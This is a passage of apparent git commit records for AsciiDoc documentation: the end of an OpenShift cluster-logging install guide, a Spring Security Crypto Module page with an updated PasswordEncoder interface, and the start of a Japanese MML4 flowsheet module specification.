\"\"\n----\n\n.. Click *Create* to deploy the logging instance, which creates the Cluster\nLogging and Elasticsearch Custom Resources.\n\n. Verify that the Pods for the Cluster Logging instance deployed:\n\n.. Switch to the *Workloads* \u2192 *Pods* page.\n\n.. Select the *openshift-logging* project.\n+\nYou should see several pods for cluster logging, Elasticsearch, Fluentd, and Kibana similar to the following list:\n+\n* cluster-logging-operator-cb795f8dc-xkckc\n* elasticsearch-cdm-b3nqzchd-1-5c6797-67kfz\n* elasticsearch-cdm-b3nqzchd-2-6657f4-wtprv\n* elasticsearch-cdm-b3nqzchd-3-588c65-clg7g\n* fluentd-2c7dg\n* fluentd-9z7kk\n* fluentd-br7r2\n* fluentd-fn2sb\n* fluentd-pb2f8\n* fluentd-zqgqx\n* kibana-7fb4fd4cc9-bvt4p\n\n. Access the Cluster Logging interface, *Kibana*, from the *Monitoring* \u2192\n*Logging* page of the {product-title} web console.\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * logging\/dedicated-cluster-deploying.adoc\n\n[id=\"dedicated-cluster-install-deploy\"]\n\n= Installing the Cluster Logging and Elasticsearch Operators\n\nYou can use the {product-title} console to install cluster logging by deploying instances of\nthe Cluster Logging and Elasticsearch Operators. The Cluster Logging Operator\ncreates and manages the components of the logging stack. The Elasticsearch Operator\ncreates and manages the Elasticsearch cluster used by cluster logging.\n\n[NOTE]\n====\nThe {product-title} cluster logging solution requires that you install both the\nCluster Logging Operator and Elasticsearch Operator. When you deploy an instance\nof the Cluster Logging Operator, it also deploys an instance of the Elasticsearch\nOperator.\n====\n\nYour OpenShift Dedicated cluster includes 600 GiB of persistent storage that is\nexclusively available for deploying Elasticsearch for cluster logging.\n\nElasticsearch is a memory-intensive application. Each Elasticsearch node needs\n8G of memory for both memory requests and limits. Each Elasticsearch node can\noperate with a lower memory setting, though this is not recommended for\nproduction deployments.\n\n.Procedure\n\n. Install the Elasticsearch Operator from the OperatorHub:\n\n.. In the {product-title} web console, click *Operators* -> *OperatorHub*.\n\n.. Choose *Elasticsearch* from the list of available Operators, and click *Install*.\n\n.. On the *Create Operator Subscription* page, under *A specific namespace on the cluster* select *openshift-logging*.\nThen, click *Subscribe*.\n\n. Install the Cluster Logging Operator from the OperatorHub:\n\n.. In the {product-title} web console, click *Operators* -> *OperatorHub*.\n\n.. Choose *Cluster Logging* from the list of available Operators, and click *Install*.\n\n.. On the *Create Operator Subscription* page, under *A specific namespace on the cluster* select *openshift-logging*.\nThen, click *Subscribe*.\n\n. Verify the operator installations:\n\n.. Switch to the *Operators* \u2192 *Installed Operators* page.\n\n.. Ensure that *Cluster Logging* and *Elasticsearch* Operators are listed in the\n*openshift-logging* project with a *Status* of *InstallSucceeded*.\n+\n[NOTE]\n====\nDuring installation an operator might display a *Failed* status. If the operator then installs with an *InstallSucceeded* message,\nyou can safely ignore the *Failed* message.\n====\n+\nIf either operator does not appear as installed, to troubleshoot further:\n+\n* Switch to the *Operators* \u2192 *Installed Operators* page and inspect\nthe *Status* column for any errors or failures.\n* Switch to the *Workloads* \u2192 *Pods* page and check the logs in each Pod in the\n`openshift-logging` project that is reporting issues.\n\n. Create and deploy a cluster logging instance:\n\n.. Switch to the *Operators* \u2192 *Installed Operators* page.\n\n.. Click the installed *Cluster Logging* Operator.\n\n.. Under the *Overview* tab, click *Create Instance* . Paste the following YAML\ndefinition into the window that displays.\n+\n.Cluster Logging Custom Resource (CR)\n[source,yaml]\n----\napiVersion: \"logging.openshift.io\/v1\"\nkind: \"ClusterLogging\"\nmetadata:\n name: \"instance\"\n namespace: \"openshift-logging\"\nspec:\n managementState: \"Managed\"\n logStore:\n type: \"elasticsearch\"\n elasticsearch:\n nodeCount: 3\n storage:\n storageClassName: \"gp2\"\n size: \"200Gi\"\n redundancyPolicy: \"SingleRedundancy\"\n nodeSelector:\n node-role.kubernetes.io\/worker: \"\"\n resources:\n requests:\n memory: 8G\n visualization:\n type: \"kibana\"\n kibana:\n replicas: 1\n nodeSelector:\n node-role.kubernetes.io\/worker: \"\"\n curation:\n type: \"curator\"\n curator:\n schedule: \"15 * * * *\"\n nodeSelector:\n node-role.kubernetes.io\/worker: \"\"\n collection:\n logs:\n type: \"fluentd\"\n fluentd: {}\n nodeSelector:\n node-role.kubernetes.io\/worker: \"\"\n----\n\n.. Click *Create* to deploy the logging instance, which creates the Cluster\nLogging and Elasticsearch Custom Resources.\n\n. Verify that the Pods for the Cluster Logging instance deployed:\n\n.. Switch to the *Workloads* \u2192 *Pods* page.\n\n.. Select the *openshift-logging* project.\n+\nYou should see several pods for cluster logging, Elasticsearch, Fluentd, and Kibana similar to the following list:\n+\n* cluster-logging-operator-cb795f8dc-xkckc\n* elasticsearch-cdm-b3nqzchd-1-5c6797-67kfz\n* elasticsearch-cdm-b3nqzchd-2-6657f4-wtprv\n* elasticsearch-cdm-b3nqzchd-3-588c65-clg7g\n* fluentd-2c7dg\n* fluentd-9z7kk\n* fluentd-br7r2\n* fluentd-fn2sb\n* fluentd-pb2f8\n* fluentd-zqgqx\n* kibana-7fb4fd4cc9-bvt4p\n\n. Access the Cluster Logging interface, *Kibana*, from the *Monitoring* \u2192\n*Logging* page of the {product-title} web console.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"acda921fe98abbcccd9b957096c7268428418ba9","subject":"Update PasswordEncoder declaration","message":"Update PasswordEncoder declaration\n\nCloses gh-10910\n","repos":"spring-projects\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security","old_file":"docs\/modules\/ROOT\/pages\/features\/integrations\/cryptography.adoc","new_file":"docs\/modules\/ROOT\/pages\/features\/integrations\/cryptography.adoc","new_contents":"[[crypto]]\n= Spring Security Crypto Module\n\n[[spring-security-crypto-introduction]]\nThe Spring Security Crypto module provides support for symmetric encryption, key generation, and password encoding.\nThe code is distributed as part of the core module but has no dependencies on any other Spring Security (or Spring) code.\n\n\n[[spring-security-crypto-encryption]]\n== Encryptors\nThe {security-api-url}org\/springframework\/security\/crypto\/encrypt\/Encryptors.html[`Encryptors`] class provides factory methods for constructing symmetric encryptors.\nThis class lets you create {security-api-url}org\/springframework\/security\/crypto\/encrypt\/BytesEncryptor.html[`BytesEncryptor`] instances to encrypt data in raw `byte[]` form.\nYou can also construct {security-api-url}org\/springframework\/security\/crypto\/encrypt\/TextEncryptor.html[TextEncryptor] instances to encrypt text strings.\nEncryptors are thread-safe.\n\n[NOTE]\n====\nBoth `BytesEncryptor` and `TextEncryptor` are interfaces. `BytesEncryptor` has multiple implementations.\n====\n\n[[spring-security-crypto-encryption-bytes]]\n=== BytesEncryptor\nYou can use the `Encryptors.stronger` factory method to construct a `BytesEncryptor`:\n\n.BytesEncryptor\n====\n.Java\n[source,java,role=\"primary\"]\n----\nEncryptors.stronger(\"password\", \"salt\");\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nEncryptors.stronger(\"password\", \"salt\")\n----\n====\n\nThe `stronger` encryption method creates an encryptor by using 256-bit AES encryption with\nGalois Counter Mode (GCM).\nIt derives the secret key by using PKCS #5's PBKDF2 (Password-Based Key Derivation Function #2).\nThis method requires Java 6.\nThe password used to generate the `SecretKey` should be kept in a secure place and should not be shared.\nThe salt is used to prevent dictionary attacks against the key in the event that your encrypted data is compromised.\nA 16-byte random initialization vector is also applied so that each encrypted message is unique.\n\nThe provided salt should be in hex-encoded String form, be random, and be at least 8 bytes in length.\nYou can generate such a salt by using a `KeyGenerator`:\n\n.Generating a key\n====\n.Java\n[source,java,role=\"primary\"]\n----\nString salt = KeyGenerators.string().generateKey(); \/\/ generates a random 8-byte salt that is then hex-encoded\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nval salt = KeyGenerators.string().generateKey() \/\/ generates a random 8-byte salt that is then hex-encoded\n----\n====\n\nYou can also use the `standard` encryption method, which is 256-bit AES in Cipher Block Chaining (CBC) Mode.\nThis mode is not https:\/\/en.wikipedia.org\/wiki\/Authenticated_encryption[authenticated] and does not provide any\nguarantees about the authenticity of the data.\nFor a more secure alternative, use `Encryptors.stronger`.\n\n[[spring-security-crypto-encryption-text]]\n=== TextEncryptor\nYou can use the `Encryptors.text` factory method to construct a standard TextEncryptor:\n\n.TextEncryptor\n====\n.Java\n[source,java,role=\"primary\"]\n----\nEncryptors.text(\"password\", \"salt\");\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nEncryptors.text(\"password\", \"salt\")\n----\n====\n\nA `TextEncryptor` uses a standard `BytesEncryptor` to encrypt text data.\nEncrypted results are returned as hex-encoded strings for easy storage on the filesystem or in a database.\n\nYou can use the `Encryptors.queryableText` factory method to construct a \"`queryable`\" `TextEncryptor`:\n\n.Queryable TextEncryptor\n====\n.Java\n[source,java,role=\"primary\"]\n----\nEncryptors.queryableText(\"password\", \"salt\");\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nEncryptors.queryableText(\"password\", \"salt\")\n----\n====\n\nThe difference between a queryable `TextEncryptor` and a standard `TextEncryptor` has to do with initialization vector (IV) handling.\nThe IV used in a queryable `TextEncryptor.encrypt` operation is shared, or constant, and is not randomly generated.\nThis means the same text encrypted multiple times always produces the same encryption result.\nThis is less secure but necessary for encrypted data that needs to be queried against.\nAn example of queryable encrypted text would be an OAuth `apiKey`.\n\n[[spring-security-crypto-keygenerators]]\n== Key Generators\nThe {security-api-url}org\/springframework\/security\/crypto\/keygen\/KeyGenerators.html[`KeyGenerators`] class provides a number of convenience factory methods for constructing different types of key generators.\nBy using this class, you can create a {security-api-url}org\/springframework\/security\/crypto\/keygen\/BytesKeyGenerator.html[`BytesKeyGenerator`] to generate `byte[]` keys.\nYou can also construct a {security-api-url}org\/springframework\/security\/crypto\/keygen\/StringKeyGenerator.html`[StringKeyGenerator]` to generate string keys.\n`KeyGenerators` is a thread-safe class.\n\n=== BytesKeyGenerator\nYou can use the `KeyGenerators.secureRandom` factory methods to generate a `BytesKeyGenerator` backed by a `SecureRandom` instance:\n\n.BytesKeyGenerator\n====\n.Java\n[source,java,role=\"primary\"]\n----\nBytesKeyGenerator generator = KeyGenerators.secureRandom();\nbyte[] key = generator.generateKey();\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nval generator = KeyGenerators.secureRandom()\nval key = generator.generateKey()\n----\n====\n\nThe default key length is 8 bytes.\nA `KeyGenerators.secureRandom` variant provides control over the key length:\n\n.KeyGenerators.secureRandom\n====\n.Java\n[source,java,role=\"primary\"]\n----\nKeyGenerators.secureRandom(16);\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nKeyGenerators.secureRandom(16)\n----\n====\n\nUse the `KeyGenerators.shared` factory method to construct a BytesKeyGenerator that always returns the same key on every invocation:\n\n.KeyGenerators.shared\n====\n.Java\n[source,java,role=\"primary\"]\n----\nKeyGenerators.shared(16);\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nKeyGenerators.shared(16)\n----\n====\n\n=== StringKeyGenerator\nYou can use the `KeyGenerators.string` factory method to construct an 8-byte, `SecureRandom` `KeyGenerator` that hex-encodes each key as a `String`:\n\n.StringKeyGenerator\n====\n.Java\n[source,java,role=\"primary\"]\n----\nKeyGenerators.string();\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nKeyGenerators.string()\n----\n====\n\n[[spring-security-crypto-passwordencoders]]\n== Password Encoding\nThe password package of the `spring-security-crypto` module provides support for encoding passwords.\n`PasswordEncoder` is the central service interface and has the following signature:\n\n====\n[source,java]\n----\npublic interface PasswordEncoder {\n\tString encode(CharSequence rawPassword);\n\n\tboolean matches(CharSequence rawPassword, String encodedPassword);\n\n\tdefault boolean upgradeEncoding(String encodedPassword) {\n\t\treturn false;\n\t}\n}\n----\n====\n\nThe `matches` method returns true if the `rawPassword`, once encoded, equals the `encodedPassword`.\nThis method is designed to support password-based authentication schemes.\n\nThe `BCryptPasswordEncoder` implementation uses the widely supported \"`bcrypt`\" algorithm to hash the passwords.\nBcrypt uses a random 16-byte salt value and is a deliberately slow algorithm, to hinder password crackers.\nYou can tune the amount of work it does by using the `strength` parameter, which takes a value from 4 to 31.\nThe higher the value, the more work has to be done to calculate the hash.\nThe default value is `10`.\nYou can change this value in your deployed system without affecting existing passwords, as the value is also stored in the encoded hash.\nThe following example uses the `BCryptPasswordEncoder`:\n\n.BCryptPasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\n\n\/\/ Create an encoder with strength 16\nBCryptPasswordEncoder encoder = new BCryptPasswordEncoder(16);\nString result = encoder.encode(\"myPassword\");\nassertTrue(encoder.matches(\"myPassword\", result));\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n\n\/\/ Create an encoder with strength 16\nval encoder = BCryptPasswordEncoder(16)\nval result: String = encoder.encode(\"myPassword\")\nassertTrue(encoder.matches(\"myPassword\", result))\n----\n====\n\nThe `Pbkdf2PasswordEncoder` implementation uses PBKDF2 algorithm to hash the passwords.\nTo defeat password cracking, PBKDF2 is a deliberately slow algorithm and should be tuned to take about .5 seconds to verify a password on your system.\nThe following system uses the `Pbkdf2PasswordEncoder`:\n\n\n.Pbkdf2PasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\n\/\/ Create an encoder with all the defaults\nPbkdf2PasswordEncoder encoder = new Pbkdf2PasswordEncoder();\nString result = encoder.encode(\"myPassword\");\nassertTrue(encoder.matches(\"myPassword\", result));\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n\/\/ Create an encoder with all the defaults\nval encoder = Pbkdf2PasswordEncoder()\nval result: String = encoder.encode(\"myPassword\")\nassertTrue(encoder.matches(\"myPassword\", result))\n----\n====\n","old_contents":"[[crypto]]\n= Spring Security Crypto Module\n\n[[spring-security-crypto-introduction]]\nThe Spring Security Crypto module provides support for symmetric encryption, key generation, and password encoding.\nThe code is distributed as part of the core module but has no dependencies on any other Spring Security (or Spring) code.\n\n\n[[spring-security-crypto-encryption]]\n== Encryptors\nThe {security-api-url}org\/springframework\/security\/crypto\/encrypt\/Encryptors.html[`Encryptors`] class provides factory methods for constructing symmetric encryptors.\nThis class lets you create {security-api-url}org\/springframework\/security\/crypto\/encrypt\/BytesEncryptor.html[`BytesEncryptor`] instances to encrypt data in raw `byte[]` form.\nYou can also construct {security-api-url}org\/springframework\/security\/crypto\/encrypt\/TextEncryptor.html[TextEncryptor] instances to encrypt text strings.\nEncryptors are thread-safe.\n\n[NOTE]\n====\nBoth `BytesEncryptor` and `TextEncryptor` are interfaces. `BytesEncryptor` has multiple implementations.\n====\n\n[[spring-security-crypto-encryption-bytes]]\n=== BytesEncryptor\nYou can use the `Encryptors.stronger` factory method to construct a `BytesEncryptor`:\n\n.BytesEncryptor\n====\n.Java\n[source,java,role=\"primary\"]\n----\nEncryptors.stronger(\"password\", \"salt\");\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nEncryptors.stronger(\"password\", \"salt\")\n----\n====\n\nThe `stronger` encryption method creates an encryptor by using 256-bit AES encryption with\nGalois Counter Mode (GCM).\nIt derives the secret key by using PKCS #5's PBKDF2 (Password-Based Key Derivation Function #2).\nThis method requires Java 6.\nThe password used to generate the `SecretKey` should be kept in a secure place and should not be shared.\nThe salt is used to prevent dictionary attacks against the key in the event that your encrypted data is compromised.\nA 16-byte random initialization vector is also applied so that each encrypted message is unique.\n\nThe provided salt should be in hex-encoded String form, be random, and be at least 8 bytes in length.\nYou can generate such a salt by using a `KeyGenerator`:\n\n.Generating a key\n====\n.Java\n[source,java,role=\"primary\"]\n----\nString salt = KeyGenerators.string().generateKey(); \/\/ generates a random 8-byte salt that is then hex-encoded\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nval salt = KeyGenerators.string().generateKey() \/\/ generates a random 8-byte salt that is then hex-encoded\n----\n====\n\nYou can also use the `standard` encryption method, which is 256-bit AES in Cipher Block Chaining (CBC) Mode.\nThis mode is not https:\/\/en.wikipedia.org\/wiki\/Authenticated_encryption[authenticated] and does not provide any\nguarantees about the authenticity of the data.\nFor a more secure alternative, use `Encryptors.stronger`.\n\n[[spring-security-crypto-encryption-text]]\n=== TextEncryptor\nYou can use the `Encryptors.text` factory method to construct a standard TextEncryptor:\n\n.TextEncryptor\n====\n.Java\n[source,java,role=\"primary\"]\n----\nEncryptors.text(\"password\", \"salt\");\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nEncryptors.text(\"password\", \"salt\")\n----\n====\n\nA `TextEncryptor` uses a standard `BytesEncryptor` to encrypt text data.\nEncrypted results are returned as hex-encoded strings for easy storage on the filesystem or in a database.\n\nYou can use the `Encryptors.queryableText` factory method to construct a \"`queryable`\" `TextEncryptor`:\n\n.Queryable TextEncryptor\n====\n.Java\n[source,java,role=\"primary\"]\n----\nEncryptors.queryableText(\"password\", \"salt\");\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nEncryptors.queryableText(\"password\", \"salt\")\n----\n====\n\nThe difference between a queryable `TextEncryptor` and a standard `TextEncryptor` has to do with initialization vector (IV) handling.\nThe IV used in a queryable `TextEncryptor.encrypt` operation is shared, or constant, and is not randomly generated.\nThis means the same text encrypted multiple times always produces the same encryption result.\nThis is less secure but necessary for encrypted data that needs to be queried against.\nAn example of queryable encrypted text would be an OAuth `apiKey`.\n\n[[spring-security-crypto-keygenerators]]\n== Key Generators\nThe {security-api-url}org\/springframework\/security\/crypto\/keygen\/KeyGenerators.html[`KeyGenerators`] class provides a number of convenience factory methods for constructing different types of key generators.\nBy using this class, you can create a {security-api-url}org\/springframework\/security\/crypto\/keygen\/BytesKeyGenerator.html[`BytesKeyGenerator`] to generate `byte[]` keys.\nYou can also construct a {security-api-url}org\/springframework\/security\/crypto\/keygen\/StringKeyGenerator.html`[StringKeyGenerator]` to generate string keys.\n`KeyGenerators` is a thread-safe class.\n\n=== BytesKeyGenerator\nYou can use the `KeyGenerators.secureRandom` factory methods to generate a `BytesKeyGenerator` backed by a `SecureRandom` instance:\n\n.BytesKeyGenerator\n====\n.Java\n[source,java,role=\"primary\"]\n----\nBytesKeyGenerator generator = KeyGenerators.secureRandom();\nbyte[] key = generator.generateKey();\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nval generator = KeyGenerators.secureRandom()\nval key = generator.generateKey()\n----\n====\n\nThe default key length is 8 bytes.\nA `KeyGenerators.secureRandom` variant provides control over the key length:\n\n.KeyGenerators.secureRandom\n====\n.Java\n[source,java,role=\"primary\"]\n----\nKeyGenerators.secureRandom(16);\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nKeyGenerators.secureRandom(16)\n----\n====\n\nUse the `KeyGenerators.shared` factory method to construct a BytesKeyGenerator that always returns the same key on every invocation:\n\n.KeyGenerators.shared\n====\n.Java\n[source,java,role=\"primary\"]\n----\nKeyGenerators.shared(16);\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nKeyGenerators.shared(16)\n----\n====\n\n=== StringKeyGenerator\nYou can use the `KeyGenerators.string` factory method to construct an 8-byte, `SecureRandom` `KeyGenerator` that hex-encodes each key as a `String`:\n\n.StringKeyGenerator\n====\n.Java\n[source,java,role=\"primary\"]\n----\nKeyGenerators.string();\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nKeyGenerators.string()\n----\n====\n\n[[spring-security-crypto-passwordencoders]]\n== Password Encoding\nThe password package of the `spring-security-crypto` module provides support for encoding passwords.\n`PasswordEncoder` is the central service interface and has the following signature:\n\n====\n[source,java]\n----\npublic interface PasswordEncoder {\n\nString encode(String rawPassword);\n\nboolean matches(String rawPassword, String encodedPassword);\n}\n----\n====\n\nThe `matches` method returns true if the `rawPassword`, once encoded, equals the `encodedPassword`.\nThis method is designed to support password-based authentication schemes.\n\nThe `BCryptPasswordEncoder` implementation uses the widely supported \"`bcrypt`\" algorithm to hash the passwords.\nBcrypt uses a random 16-byte salt value and is a deliberately slow algorithm, to hinder password crackers.\nYou can tune the amount of work it does by using the `strength` parameter, which takes a value from 4 to 31.\nThe higher the value, the more work has to be done to calculate the hash.\nThe default value is `10`.\nYou can change this value in your deployed system without affecting existing passwords, as the value is also stored in the encoded hash.\nThe following example uses the `BCryptPasswordEncoder`:\n\n.BCryptPasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\n\n\/\/ Create an encoder with strength 16\nBCryptPasswordEncoder encoder = new BCryptPasswordEncoder(16);\nString result = encoder.encode(\"myPassword\");\nassertTrue(encoder.matches(\"myPassword\", result));\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n\n\/\/ Create an encoder with strength 16\nval encoder = BCryptPasswordEncoder(16)\nval result: String = encoder.encode(\"myPassword\")\nassertTrue(encoder.matches(\"myPassword\", result))\n----\n====\n\nThe `Pbkdf2PasswordEncoder` implementation uses PBKDF2 algorithm to hash the passwords.\nTo defeat password cracking, PBKDF2 is a deliberately slow algorithm and should be tuned to take about .5 seconds to verify a password on your system.\nThe following system uses the `Pbkdf2PasswordEncoder`:\n\n\n.Pbkdf2PasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\n\/\/ Create an encoder with all the defaults\nPbkdf2PasswordEncoder encoder = new Pbkdf2PasswordEncoder();\nString result = encoder.encode(\"myPassword\");\nassertTrue(encoder.matches(\"myPassword\", result));\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n\/\/ Create an encoder with all the defaults\nval encoder = Pbkdf2PasswordEncoder()\nval result: String = encoder.encode(\"myPassword\")\nassertTrue(encoder.matches(\"myPassword\", result))\n----\n====\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"94e170c1bd7e9d31f70f5504e96b92a7a922c3d8","subject":"fixed #89","message":"fixed #89\n","repos":"skoba\/mml,skoba\/mml","old_file":"doc\/MML4\/flowsheet.adoc","new_file":"doc\/MML4\/flowsheet.adoc","new_contents":":Author: Shinji KOBAYASHI\n:Email: skoba@moss.gr.jp\n:toc: right\n:toclevels: 2\n:pagenums:\n:numberd:\n:sectnums:\n:imagesdir: .\/figures\n:linkcss:\n\n=== \u4f53\u6e29\u8868\u30e2\u30b8\u30e5\u30fc\u30eb\n==== \u76ee\u7684\u3068\u5bfe\u8c61\n\u65e5\u3005\u306e\u4ecb\u8b77\u3084\u770b\u8b77\u3067\u8a18\u9332\u3055\u308c\u308b\u4f53\u6e29\u8868\u3092\u8a18\u9332\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u308b\u3002\n\n\u3053\u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u306b\u304a\u3044\u3066\u306f\u3001\u30d0\u30a4\u30bf\u30eb\u30b5\u30a4\u30f3\u30e2\u30b8\u30e5\u30fc\u30eb\u3068\u3042\u308f\u305b\u3066\u3001\u98df\u4e8b\u6442\u53d6\u91cf\u3001\u6392\u6cc4\u306b\u3064\u3044\u3066\u306e\u60c5\u5831\u3092\u6271\u3063\u3066\u3044\u304f\u3002\u60f3\u5b9a\u3055\u308c\u308b\u30e6\u30fc\u30b9\u30b1\u30fc\u30b9\u306f\u4f53\u6e29\u8868\u306b\u8a18\u8f09\u3055\u308c\u308b\u5404\u7a2e\u60c5\u5831\u3067\u3042\u308b\u3002\n\n\u56f3\u306b\u793a\u3059\u3088\u3046\u306b\u3001\u30d0\u30a4\u30bf\u30eb\u30b5\u30a4\u30f3\u3084\u6442\u98df\u60c5\u5831\u3001\u6392\u6cc4\u306b\u95a2\u3059\u308b\u60c5\u5831\u306f\u7e70\u308a\u8fd4\u3057\u8a18\u9332\u3055\u308c\u308b\u3002\n\n==== namespace\u5ba3\u8a00\n\u3053\u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u306enamespace\u306f\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u5ba3\u8a00\u3059\u308b\u3002\n[source, xml]\n xmlns:mmlFs=\"http:\/\/www.medxml.net\/MML\/v4\/ContentModule\/FlowSheet\/1.0\"\n\n==== \u6587\u66f8\u30d8\u30c3\u30c0\u30fc\u60c5\u5831 (docInfo) \u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u500b\u5225\u4ed5\u69d8\n===== docInfo\n\u5c5e\u6027 contentModuleType \u306b MML0005 \u30c6\u30fc\u30d6\u30eb\u3088\u308a\u300cflowsheet\u300d\u3092\u5165\u529b\u3059\u308b\u3053\u3068\uff0e\n\n===== title\n\u3053\u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u306f\u75c5\u68df\u3042\u308b\u3044\u306f\u4ecb\u8b77\u65bd\u8a2d\u306a\u3069\u3067\u65e5\u3005\u8a18\u9332\u3055\u308c\u308b\u4f53\u6e29\u8868\u3092\u4e3b\u306a\u30e6\u30fc\u30b9\u30b1\u30fc\u30b9\u3068\u8003\u3048\u3066\u3044\u308b\u3002\u3057\u305f\u304c\u3063\u3066\u3001\u30ec\u30dd\u30fc\u30c8\u30bf\u30a4\u30c8\u30eb\u3068\u3057\u3066\u306f\u300c\u4f53\u6e29\u8868\u300d\u3067\u3042\u308b\u3053\u3068\u3092\u524d\u63d0\u3068\u3059\u308b\u304c\u3001\u75c5\u68df\u3067\u6163\u7528\u7684\u306b\u5229\u7528\u3055\u308c\u308b\u300c\u71b1\u578b\u8868\u300d\u300c\u4f53\u6e29\u8868\u300d\u3084\u300c\u6e29\u5ea6\u677f\u300d\u306a\u3069\u304c\u3001\u30bf\u30a4\u30c8\u30eb\u3068\u3057\u3066\u4f7f\u7528\u3055\u308c\u308b\u3053\u3068\u3082\u60f3\u5b9a\u3057\u3066\u3044\u308b\u3002\n\n\u5c5e\u6027\u306e generationPurpose \u306f\uff0cMML0007 \u30c6\u30fc\u30d6\u30eb\u3088\u308a\u300cflowsheet\u300d (\u4f53\u6e29\u8868) \u3068\u5165\u529b\u3059\u308b\u3053\u3068\uff0e\n\n===== confirmDate\n\u30e2\u30b8\u30e5\u30fc\u30eb\u751f\u6210\u65e5\u3067\u3042\u308a\uff0c\u5168\u4f53\u3068\u3057\u3066\u306e\u5831\u544a\u304c\u306a\u3055\u308c\u305f\u6642\u523b\u3092\u793a\u3059\uff0e\n\n===== mmlCi:CreatorInfo\n\u4f53\u6e29\u8868\u30e2\u30b8\u30e5\u30fc\u30eb\u3067\u306f\u3001\u591a\u8077\u7a2e\u306b\u308f\u305f\u308b\u8907\u6570\u306e\u4eba\u9593\u304c\u89b3\u5bdf\u3057\u305f\u60c5\u5831\u304c\u4e00\u3064\u306e\u5831\u544a\u66f8\u306b\u8a18\u8f09\u3055\u308c\u308b\u3053\u3068\u304c\u3042\u308b\u3002\u6700\u7d42\u7684\u306a\u8a18\u8f09\u8005\u3042\u308b\u3044\u306f\u4ee3\u8868\u8005\u304c\u4f5c\u6210\u8005\u60c5\u5831\u3068\u3057\u3066\u8a18\u9332\u3055\u308c\u308b\u3002\n\n.\u30a8\u30ec\u30e1\u30f3\u30c8\u69cb\u9020\u56f3\nimage::mmlfs.png[]\n\n.\u30a8\u30ec\u30e1\u30f3\u30c8\u4e00\u89a7\u8868\n[options=\"header\"]\n|===\n| |Elements|Attribute|Data types|Occurrence|TableId\n|M23.|mmlFs:FlowSheetModule| | | |\n|M23.1.|mmlFs:context| | | |\n|M23.1.1.|mmlFs:facility| |string| |\n| | |mmlFs:facilityCode|string|#REQUIRED|\n| | |mmlFs:facilityCodeId|string|#REQUIRED|MML0027\n|M23.1.2.|mmlFs:department| |string|?|\n| | |mmlFs:depCode|string|#IMPLIED|MML0028\n| | |mmlFs:depCodeId|string|#IMPLIED|\n|M23.1.3.|mmlFs:ward| |string|?|\n| | |mmlFs:wardCode|string|#IMPLIED|\u30e6\u30fc\u30b6\u6307\u5b9a\n| | |mmlFs:wardCodeId|string|#IMPLIED|\n|M23.1.4.|mmlFs:observer| |string|?|\n| | |mmlFs:obsCode|string|#IMPLIED|\u30e6\u30fc\u30b6\u6307\u5b9a\n| | |mmlFs:obsCodeId|string|#IMPLIED|\n|M23.2.|mmlVs:VitalSignModule| | |*|\n|M23.3.|mmlFs:intake| | |*|\n|M23.3.1.|mmlFs:intakeType| |string| |mmlFs01\n|M23.3.2.|mmlFs:intakeVolume| |decimal|?|\n|M23.3.3.|mmlFs:intakeUnit| |string|?|mmlFs02\n|M23.3.4.|mmlFs:intakePathway| |string|?|\n|M23.3.5.|mmlFs:intakeStartTime| |dateTime|?|\n|M23.3.6.|mmlFs:intakeEndTime| |dateTime|?|\n|M23.3.7.|mmlFs:intakeMemo| |string|?|\n|M23.4.|mmlFs:bodilyOutput| | |*|\n|M23.4.1.|mmlFs:boType| |string| |mmlFs03\n|M23.4.2.|mmlFs:boVolume| |decimal|?|\n|M23.4.3.|mmlFs:boUnit| |string|?|mmlFs04\n|M23.4.4.|mmlFs:boStatus| |string|?|\n|M23.4.5.|mmlFs:boColor| |string|?|\n|M23.4.6.|mmlFs:boPathway| |string|?|\n|M23.4.7.|mmlFs:boStartTime| |dateTime|?|\n|M23.4.8.|mmlFs:boEndTime| |dateTime|?|\n|M23.4.9.|mmlFs:boMemo| |string|?|\n|M23.4.10.|mmlFs:boFrequency| | |*|\n|M23.4.10.1.|mmlFs:bofTimes| |decimal|?|\n|M23.4.10.2.|mmlFs:bofPeriodStartTime| |dateTime|?|\n|M23.4.10.3.|mmlFs:bofPeriodEndTime| |dateTime|?|\n|M23.4.10.4.|mmlFs:bofMemo| 